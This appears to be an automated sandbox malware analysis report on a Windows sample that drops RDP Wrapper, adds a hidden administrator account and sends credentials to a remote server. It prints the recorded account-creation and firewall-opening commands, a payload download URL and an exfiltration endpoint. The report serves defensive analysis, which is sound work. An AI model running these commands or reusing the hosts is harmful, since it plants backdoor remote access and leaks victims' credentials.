                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<>u__2Func`2Dictionary`2ToInt64<Main>d__5get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCr
eator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderManagementObjectSearcherResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatManagementBaseObjectManagementObjectSelectBegin
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: 00000000000000000400000000000000g.PDB source: hloRQZmlfg.exe, 00000000.00000002.1923069816.0000000006B90000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr

                            Data Obfuscation

                            Source: hloRQZmlfg.exe, QXNzZW1ibHlMb2FkZXJB.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Source: Yara match | File source: hloRQZmlfg.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.hloRQZmlfg.exe.880000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: hloRQZmlfg.exe PID: 2444, type: MEMORYSTR
                            Source: hloRQZmlfg.exe | Static PE information: 0x84BB012B [Wed Jul 25 16:54:03 2040 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_004430DC push 00443161h; ret 8_2_00443159
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00439674 push ecx; mov dword ptr [esp], ecx 8_2_00439675
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00420164 push 004201DAh; ret 8_2_004201D2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040A178 push 0040A1E7h; ret 8_2_0040A1DF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00437134 push 00437201h; ret 8_2_004371F9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00443188 push 00443230h; ret 8_2_00443228
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043421C push ecx; mov dword ptr [esp], edx 8_2_0043421E
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0044323C push 004432C7h; ret 8_2_004432BF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00437298 push 0043732Eh; ret 8_2_00437326
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00437360 push 004373ADh; ret 8_2_004373A5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043A3F8 push 0043A450h; ret 8_2_0043A448
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_004176D4 push 00417879h; ret 8_2_00417871
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00421998 push 004219E5h; ret 8_2_004219DD
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0042AA70 push ecx; mov dword ptr [esp], edx 8_2_0042AA75
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040CA10 push eax; retf 0040h 8_2_0040CA11
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0042AAB4 push ecx; mov dword ptr [esp], edx 8_2_0042AAB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00415C58 push ecx; mov dword ptr [esp], edx 8_2_00415C5D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0040EC80 push ecx; mov dword ptr [esp], ecx 8_2_0040EC85
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_00404E0C push eax; ret 8_2_00404E48
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Code function: 8_2_0043FE8C push 0043FEE0h; ret 8_2_0043FED8
                            Source: hloRQZmlfg.exe | Static PE information: section name: .text entropy: 7.703627501061181

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Program Files\RDP Wrapper\rdpwrap.dll
Source: C:\Users\user\Desktop\hloRQZmlfg.exe File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Windows\System32\rfxvmt.dll
Source: C:\Windows\System32\drivers\tsusbhub.sys Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle, 8_2_0043B58C
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\hloRQZmlfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Memory allocated: 2AD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Memory allocated: 2CF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Memory allocated: 2B00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle, 8_2_0043B7D4
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Window / User API: threadDelayed 7636
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Window / User API: threadDelayed 2338
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 6212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524 Thread sleep count: 7636 > 30
Source: C:\Users\user\Desktop\hloRQZmlfg.exe TID: 4524 Thread sleep count: 2338 > 30
Source: C:\Users\user\Desktop\hloRQZmlfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\hloRQZmlfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_004092D8 FindFirstFileW,FindClose, 8_2_004092D8
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_0040F73C FindFirstFileW,FindClose, 8_2_0040F73C
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW, 8_2_00408EB9
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_00409D02 GetSystemInfo, 8_2_00409D02
Source: Amcache.hve.38.dr Binary or memory string: VMware
Source: Amcache.hve.38.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.38.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.38.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.38.dr Binary or memory string: VMware, Inc.
Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *Hyper-V Administrators
Source: Amcache.hve.38.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.38.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.38.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.38.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.38.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.38.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.38.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: Amcache.hve.38.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators
Source: Amcache.hve.38.dr Binary or memory string: vmci.sys
Source: net1.exe, 0000001C.00000002.1770023496.0000000003208000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators9+h
Source: Amcache.hve.38.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.38.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.38.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.38.dr Binary or memory string: VMware20,1
Source: Amcache.hve.38.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.38.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.38.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.38.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.38.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.38.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.38.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.38.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.38.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.38.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.38.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\drivers\tsusbhub.sys System information queried: ModuleInformation
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 8_2_004093C0
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_00408908
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW, 8_2_00412C4A
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW, 8_2_00412C4C
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: GetLocaleInfoW, 8_2_00412C98
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Queries volume information: C:\Users\user\Desktop\hloRQZmlfg.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_00411154 GetLocalTime, 8_2_00411154
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 8_2_00414698 GetVersionExW, 8_2_00414698
Source: C:\Users\user\Desktop\hloRQZmlfg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: Amcache.hve.38.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.38.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.38.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.38.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.38.dr Binary or memory string: MsMpEng.exe

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 111 Windows Management Instrumentation | 1 LSASS Driver | 1 LSASS Driver | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 2 Remote Desktop Protocol | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Service Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Create Account | 1 Access Token Manipulation | 31 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Windows Service | 21 Windows Service | 12 Software Packing | NTDS | 128 System Information Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Process Injection | 1 Timestomp | LSA Secrets | 221 Security Software Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Network Configuration Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection
                            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph ID: 1528586 | Sample: hloRQZmlfg.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100

Start:
• DNS/IP Info: hansgborn.eu; api.ipify.org
• Signatures: Multi AV Scanner detection for domain / URL; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 8 other signatures
• Started: hloRQZmlfg.exe 15 3; rdpdr.sys 8; rdpvideominiport.sys 4; tsusbhub.sys 3

hloRQZmlfg.exe:
• DNS/IP Info: 8.46.123.33, 3389, 49711 AS-PUBMATICUS United States; 147.45.44.104, 49706, 80 FREE-NET-ASFREEnetEU Russian Federation; 3 other IPs or domains
• Created File: C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 (dropped)
• Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
• Started: cmd.exe 1; cmd.exe 1; cmd.exe 1; 4 other processes

cmd.exe (first):
• Started: RDPWInst.exe 2 5; conhost.exe

cmd.exe (second):
• Signatures: Adds a new user with administrator rights
• Started: net.exe 1; conhost.exe

cmd.exe (third):
• Started: net.exe 1; conhost.exe

4 other processes:
• Created File: C:\ProgramData\Microsoft\...\Report.wer, Unicode (dropped)
• Started: net.exe 1; net.exe 1; 4 other processes

RDPWInst.exe:
• Created File: C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ (dropped); C:\Windows\System32\rfxvmt.dll, PE32+ (dropped)
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Uses netsh to modify the Windows network and firewall settings; 3 other signatures
• Started: netsh.exe 2

net.exe (each of the four instances):
• Started: net1.exe 1

Source | Detection | Scanner | Label | Link
hloRQZmlfg.exe | 63% | ReversingLabs | Win32.Adware.RedCap | -
hloRQZmlfg.exe | 72% | Virustotal | - | Browse
hloRQZmlfg.exe | 100% | Avira | HEUR/AGEN.1311769 | -
hloRQZmlfg.exe | 100% | Joe Sandbox ML | - | -
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files\RDP Wrapper\rdpwrap.dll | 54% | ReversingLabs | Win64.PUA.RDPWrapper | -
C:\Program Files\RDP Wrapper\rdpwrap.dll | 57% | Virustotal | - | Browse
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 68% | ReversingLabs | Win32.PUA.RDPWrap | -
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | 78% | Virustotal | - | Browse
C:\Windows\System32\rfxvmt.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\rfxvmt.dll | 0% | Virustotal | - | Browse
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
hansgborn.eu | 0% | Virustotal | - | Browse
api.ipify.org | 0% | Virustotal | - | Browse
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe | -
http://upx.sf.net | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
http://stascorp.com/load/1-1-0-62 | 1% | Virustotal | - | Browse
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | 23% | Virustotal | - | Browse
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal | - | Browse
http://www.apache.org/licenses/ | 0% | Virustotal | - | Browse
https://github.com/lontivero/Open.Nat/issuesOAlso | 0% | Virustotal | - | Browse
http://hansgborn.eu | 0% | Virustotal | - | Browse
http://api.ipify.org/ | 0% | Virustotal | - | Browse
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | 2% | Virustotal | - | Browse
https://hansgborn.eu/receive.php | 0% | Virustotal | - | Browse
http://147.45.44.104 | 21% | Virustotal | - | Browse
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU | 0% | Virustotal | - | Browse
http://api.ipify.org | 0% | Virustotal | - | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hansgborn.eu | 188.114.96.3 | true | false | - | unknown
api.ipify.org | 104.26.12.205 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe | false | - | unknown
http://api.ipify.org/ | false | - | unknown
https://hansgborn.eu/receive.php | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://stascorp.com/load/1-1-0-62 | RDPWInst.exe, RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | false | - | unknown
http://www.apache.org/licenses/LICENSE-2.0 | RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | false | - | unknown
http://api.ipify.orgd | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://stascorp.comDVarFileInfo$ | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.8.dr | false | - | unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU | RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | false | - | unknown
http://hansgborn.eu | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/soap/encoding/ | hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
